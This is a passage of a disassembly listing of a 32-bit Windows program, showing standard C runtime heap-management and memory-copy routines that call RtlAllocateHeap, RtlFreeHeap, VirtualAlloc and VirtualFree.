pop edi
pop esi
pop ebx
call sub_40124E
leave
retn
sub_402D07 endp
; =============== S U B R O U T I N E =======================================
sub_402EED proc near ; CODE XREF: sub_401C1D+C�p
; sub_401C7A+D�p ...
cmp dword_40782C, 0
jnz short loc_402F08
push 0FFFFFFFDh
call sub_402D07
pop ecx
mov dword_40782C, 1
loc_402F08: ; CODE XREF: sub_402EED+7�j
xor eax, eax
retn
sub_402EED endp
; =============== S U B R O U T I N E =======================================
sub_402F0B proc near ; CODE XREF: sub_401C7A+92�p
; sub_401C7A+B7�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_402F41
cmp dword_407704, 3
push esi
jnz short loc_402F33
call sub_403355
test eax, eax
pop ecx
push esi
jz short loc_402F33
push eax
call sub_403380
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_402F33: ; CODE XREF: sub_402F0B+11�j
; sub_402F0B+1C�j
push 0
push dword_407700
call ds:dword_4050AC ; RtlFreeHeap
loc_402F41: ; CODE XREF: sub_402F0B+7�j
pop esi
retn
sub_402F0B endp
; =============== S U B R O U T I N E =======================================
sub_402F43 proc near ; CODE XREF: sub_402F89+B�p
arg_0 = dword ptr 4
cmp dword_407704, 3
push esi
mov esi, [esp+4+arg_0]
jnz short loc_402F64
cmp esi, dword_4074B4
ja short loc_402F64
push esi
call sub_403B34
test eax, eax
pop ecx
jnz short loc_402F87
loc_402F64: ; CODE XREF: sub_402F43+C�j
; sub_402F43+14�j
test esi, esi
jnz short loc_402F69
inc esi
loc_402F69: ; CODE XREF: sub_402F43+23�j
cmp dword_407704, 1
jz short loc_402F78
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_402F78: ; CODE XREF: sub_402F43+2D�j
push esi
push 0
push dword_407700
call ds:dword_4050C8 ; RtlAllocateHeap
loc_402F87: ; CODE XREF: sub_402F43+1F�j
pop esi
retn
sub_402F43 endp
; =============== S U B R O U T I N E =======================================
sub_402F89 proc near ; CODE XREF: sub_402FB5+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_402FB2
loc_402F90: ; CODE XREF: sub_402F89+27�j
push [esp+arg_0]
call sub_402F43
test eax, eax
pop ecx
jnz short locret_402FB4
cmp [esp+arg_4], eax
jz short locret_402FB4
push [esp+arg_0]
call sub_404540
test eax, eax
pop ecx
jnz short loc_402F90
loc_402FB2: ; CODE XREF: sub_402F89+5�j
xor eax, eax
locret_402FB4: ; CODE XREF: sub_402F89+13�j
; sub_402F89+19�j
retn
sub_402F89 endp
; =============== S U B R O U T I N E =======================================
sub_402FB5 proc near ; CODE XREF: sub_401C7A+3E�p
; sub_401C7A+6E�p ...
arg_0 = dword ptr 4
push dword_4074A4
push [esp+4+arg_0]
call sub_402F89
pop ecx
pop ecx
retn
sub_402FB5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FD0 proc near ; CODE XREF: sub_401F4F+10A�p
; sub_403E30+8D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_402FF0
cmp edi, eax
jb loc_40316C
loc_402FF0: ; CODE XREF: sub_402FD0+16�j
test edi, 3
jnz short loc_40300C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40302C
rep movsd
jmp ds:off_40311C[edx*4]
; ---------------------------------------------------------------------------
loc_40300C: ; CODE XREF: sub_402FD0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_403024
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_40302C+4[eax*4]
; ---------------------------------------------------------------------------
loc_403024: ; CODE XREF: sub_402FD0+46�j
jmp dword ptr ds:loc_40312C[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40302C: ; CODE XREF: sub_402FD0+31�j
; sub_402FD0+8E�j ...
jmp ds:off_4030B0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_403040
dd offset loc_40306C
dd offset loc_403090
; ---------------------------------------------------------------------------
loc_403040: ; DATA XREF: sub_402FD0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_40302C
rep movsd
jmp ds:off_40311C[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40306C: ; DATA XREF: sub_402FD0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_40302C
rep movsd
jmp ds:off_40311C[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_403090: ; DATA XREF: sub_402FD0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_40302C
rep movsd
jmp ds:off_40311C[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4030B0 dd offset loc_403113 ; DATA XREF: sub_402FD0:loc_40302C�r
dd offset loc_403100
dd offset loc_4030F8
dd offset loc_4030F0
dd offset loc_4030E8
dd offset loc_4030E0
dd offset loc_4030D8
dd offset loc_4030D0
; ---------------------------------------------------------------------------
loc_4030D0: ; CODE XREF: sub_402FD0:loc_40302C�j
; DATA XREF: sub_402FD0+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4030D8: ; CODE XREF: sub_402FD0:loc_40302C�j
; DATA XREF: sub_402FD0+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4030E0: ; CODE XREF: sub_402FD0:loc_40302C�j
; DATA XREF: sub_402FD0+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4030E8: ; CODE XREF: sub_402FD0:loc_40302C�j
; DATA XREF: sub_402FD0+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4030F0: ; CODE XREF: sub_402FD0:loc_40302C�j
; DATA XREF: sub_402FD0+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4030F8: ; CODE XREF: sub_402FD0:loc_40302C�j
; DATA XREF: sub_402FD0+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_403100: ; CODE XREF: sub_402FD0:loc_40302C�j
; DATA XREF: sub_402FD0+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_403113: ; CODE XREF: sub_402FD0:loc_40302C�j
; DATA XREF: sub_402FD0:off_4030B0�o
jmp ds:off_40311C[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40311C dd offset loc_40312C ; DATA XREF: sub_402FD0+35�r
; sub_402FD0+92�r ...
dd offset loc_403134
dd offset loc_403140
dd offset loc_403154
; ---------------------------------------------------------------------------
loc_40312C: ; CODE XREF: sub_402FD0+35�j
; sub_402FD0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403134: ; CODE XREF: sub_402FD0+35�j
; sub_402FD0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_403140: ; CODE XREF: sub_402FD0+35�j
; sub_402FD0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403154: ; CODE XREF: sub_402FD0+35�j
; sub_402FD0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40316C: ; CODE XREF: sub_402FD0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4031A0
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_403194
std
rep movsd
cld
jmp ds:off_4032B8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_403194: ; CODE XREF: sub_402FD0+1B5�j
; sub_402FD0+210�j ...
neg ecx
jmp dword ptr ds:loc_403268[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4031A0: ; CODE XREF: sub_402FD0+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4031B8
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_4031B8+4[eax*4]
; ---------------------------------------------------------------------------
loc_4031B8: ; CODE XREF: sub_402FD0+1DA�j
; DATA XREF: sub_402FD0+1E1�r
jmp ds:off_4032B8[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_4031CB+1
dd offset loc_4031F0
; ---------------------------------------------------------------------------
sbb [edx], dh
inc eax
loc_4031CB: ; DATA XREF: sub_402FD0+1F0�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_403194
std
rep movsd
cld
jmp ds:off_4032B8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4031F0: ; DATA XREF: sub_402FD0+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_403194
std
rep movsd
cld
jmp ds:off_4032B8[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_403194
std
rep movsd
cld
jmp ds:off_4032B8[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_40326C
dd offset loc_403274
dd offset loc_40327C
dd offset loc_403284
dd offset loc_40328C
; ---------------------------------------------------------------------------
xchg eax, esp
xor al, [eax+0]
pushf
xor al, [eax+0]
loc_403268: ; DATA XREF: sub_402FD0+1C6�r
scasd
xor al, [eax+0]
loc_40326C: ; DATA XREF: sub_402FD0+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_403274: ; DATA XREF: sub_402FD0+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_40327C: ; DATA XREF: sub_402FD0+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_403284: ; DATA XREF: sub_402FD0+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_40328C: ; DATA XREF: sub_402FD0+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4032AF: ; CODE XREF: sub_402FD0+1C6�j
jmp ds:off_4032B8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4032B8 dd offset loc_4032C8 ; DATA XREF: sub_402FD0+1BB�r
; sub_402FD0:loc_4031B8�r ...
dd offset loc_4032D0
dd offset loc_4032E0
dd offset loc_4032F4
; ---------------------------------------------------------------------------
loc_4032C8: ; CODE XREF: sub_402FD0+1BB�j
; sub_402FD0:loc_4031B8�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4032D0: ; CODE XREF: sub_402FD0+1BB�j
; sub_402FD0:loc_4031B8�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4032E0: ; CODE XREF: sub_402FD0+1BB�j
; sub_402FD0:loc_4031B8�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4032F4: ; CODE XREF: sub_402FD0+1BB�j
; sub_402FD0:loc_4031B8�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402FD0 endp
; =============== S U B R O U T I N E =======================================
sub_40330D proc near ; CODE XREF: sub_4022BE+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_407700
call ds:dword_4050C8 ; RtlAllocateHeap
test eax, eax
mov dword_4074B0, eax
jnz short loc_40332A
retn
; ---------------------------------------------------------------------------
loc_40332A: ; CODE XREF: sub_40330D+1A�j
mov ecx, [esp+arg_0]
and dword_4074A8, 0
and dword_4074AC, 0
mov dword_4074B8, eax
xor eax, eax
mov dword_4074B4, ecx
mov dword_4074BC, 10h
inc eax
retn
sub_40330D endp
; =============== S U B R O U T I N E =======================================
sub_403355 proc near ; CODE XREF: sub_402F0B+13�p
; sub_403E30+48�p ...
arg_0 = dword ptr 4
mov eax, dword_4074AC
lea ecx, [eax+eax*4]
mov eax, dword_4074B0
lea ecx, [eax+ecx*4]
jmp short loc_403379
; ---------------------------------------------------------------------------
loc_403367: ; CODE XREF: sub_403355+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_40337F
add eax, 14h
loc_403379: ; CODE XREF: sub_403355+10�j
cmp eax, ecx
jb short loc_403367
xor eax, eax
locret_40337F: ; CODE XREF: sub_403355+1F�j
retn
sub_403355 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403380 proc near ; CODE XREF: sub_402F0B+1F�p
; sub_403E30+9C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_403694
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_40344B
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_4033E3
push 3Fh
pop edx
loc_4033E3: ; CODE XREF: sub_403380+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_40342D
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_40340E
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_40342A
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_40342A
; ---------------------------------------------------------------------------
loc_40340E: ; CODE XREF: sub_403380+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_40342A
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_40342A: ; CODE XREF: sub_403380+85�j
; sub_403380+8C�j ...
mov ebx, [ebp+arg_4]
loc_40342D: ; CODE XREF: sub_403380+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_40344B: ; CODE XREF: sub_403380+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_403459
push 3Fh
pop edx
loc_403459: ; CODE XREF: sub_403380+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_4034F7
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_40347E
mov ebx, esi
loc_40347E: ; CODE XREF: sub_403380+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_403490
mov edx, esi
loc_403490: ; CODE XREF: sub_403380+10C�j
cmp ebx, edx
jz short loc_4034F2
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_4034DA
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_4034C0
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_4034DA
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_4034DA
; ---------------------------------------------------------------------------
loc_4034C0: ; CODE XREF: sub_403380+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_4034DA
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_4034DA: ; CODE XREF: sub_403380+11D�j
; sub_403380+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_4034F2: ; CODE XREF: sub_403380+112�j
mov esi, [ebp+arg_4]
jmp short loc_4034FA
; ---------------------------------------------------------------------------
loc_4034F7: ; CODE XREF: sub_403380+E2�j
mov ebx, [ebp+arg_0]
loc_4034FA: ; CODE XREF: sub_403380+175�j
cmp [ebp+var_C], 0
jnz short loc_403508
cmp ebx, edx
jz loc_403588
loc_403508: ; CODE XREF: sub_403380+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_403588
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_40355F
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_40354E
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_40354E: ; CODE XREF: sub_403380+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_403588
; ---------------------------------------------------------------------------
loc_40355F: ; CODE XREF: sub_403380+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403575
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_403575: ; CODE XREF: sub_403380+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_403588: ; CODE XREF: sub_403380+182�j
; sub_403380+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_403693
mov eax, dword_4074A8
test eax, eax
jz loc_403685
mov ecx, dword_4074C0
mov esi, ds:dword_4050A8
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_4074C0
mov eax, dword_4074A8
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_4074A8
mov eax, [eax+10h]
mov ecx, dword_4074C0
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_4074A8
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_4074A8
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_403616
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_4074A8
loc_403616: ; CODE XREF: sub_403380+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_403685
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_4074A8
push dword ptr [eax+10h]
push 0
push dword_407700
call ds:dword_4050AC ; RtlFreeHeap
mov eax, dword_4074AC
mov edx, dword_4074B0
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_4074A8
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404560
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_4074AC
cmp eax, dword_4074A8
jbe short loc_40367B
sub [ebp+arg_0], 14h
loc_40367B: ; CODE XREF: sub_403380+2F5�j
mov eax, dword_4074B0
mov dword_4074B8, eax
loc_403685: ; CODE XREF: sub_403380+223�j
; sub_403380+29A�j
mov eax, [ebp+arg_0]
mov dword_4074A8, eax
mov dword_4074C0, edi
loc_403693: ; CODE XREF: sub_403380+216�j
pop ebx
loc_403694: ; CODE XREF: sub_403380+37�j
pop edi
pop esi
leave
retn
sub_403380 endp
; =============== S U B R O U T I N E =======================================
sub_403698 proc near ; CODE XREF: sub_403B34+150�p
mov eax, dword_4074AC
mov ecx, dword_4074BC
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_4036DE
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_4074B0
push edi
push dword_407700
call ds:dword_4050D0 ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_4036CD
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4036CD: ; CODE XREF: sub_403698+2F�j
add dword_4074BC, 10h
mov dword_4074B0, eax
mov eax, dword_4074AC
loc_4036DE: ; CODE XREF: sub_403698+10�j
mov ecx, dword_4074B0
push esi
push 41C4h
push 8
push dword_407700
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call ds:dword_4050C8 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jnz short loc_403709
loc_403705: ; CODE XREF: sub_403698+9B�j
xor eax, eax
jmp short loc_40374C
; ---------------------------------------------------------------------------
loc_403709: ; CODE XREF: sub_403698+6B�j
push 4
push 2000h
push 100000h
push edi
call ds:dword_4050CC ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_403735
push dword ptr [esi+10h]
push edi
push dword_407700
call ds:dword_4050AC ; RtlFreeHeap
jmp short loc_403705
; ---------------------------------------------------------------------------
loc_403735: ; CODE XREF: sub_403698+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_4074AC
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_40374C: ; CODE XREF: sub_403698+6F�j
pop esi
pop edi
retn
sub_403698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40374F proc near ; CODE XREF: sub_403B34+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_403767
; ---------------------------------------------------------------------------
loc_403764: ; CODE XREF: sub_40374F+1A�j
shl eax, 1
inc ebx
loc_403767: ; CODE XREF: sub_40374F+13�j
test eax, eax
jge short loc_403764
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_403780: ; CODE XREF: sub_40374F+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_403780
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_4050CC ; VirtualAlloc
test eax, eax
jnz short loc_4037B3
or eax, 0FFFFFFFFh
jmp loc_403850
; ---------------------------------------------------------------------------
loc_4037B3: ; CODE XREF: sub_40374F+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_403803
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_4037CB: ; CODE XREF: sub_40374F+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_4037CB
mov edx, [ebp+var_4]
loc_403803: ; CODE XREF: sub_40374F+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_403840
or [eax+4], edi
loc_403840: ; CODE XREF: sub_40374F+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_403850: ; CODE XREF: sub_40374F+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_40374F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403855 proc near ; CODE XREF: sub_403E30+63�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_4039F7
test bl, 1
jnz loc_4039F0
add ebx, ecx
cmp esi, ebx
jg loc_4039F0
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_4038CA
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_4038CA: ; CODE XREF: sub_403855+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_403915
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_4038F6
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_403915
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_403915
; ---------------------------------------------------------------------------
loc_4038F6: ; CODE XREF: sub_403855+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_403915
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_403915: ; CODE XREF: sub_403855+7B�j
; sub_403855+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_4039DE
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_40394F
push 3Fh
pop edi
loc_40394F: ; CODE XREF: sub_403855+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_4039CC
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_4039A3
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_40399B
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_40399B: ; CODE XREF: sub_403855+136�j
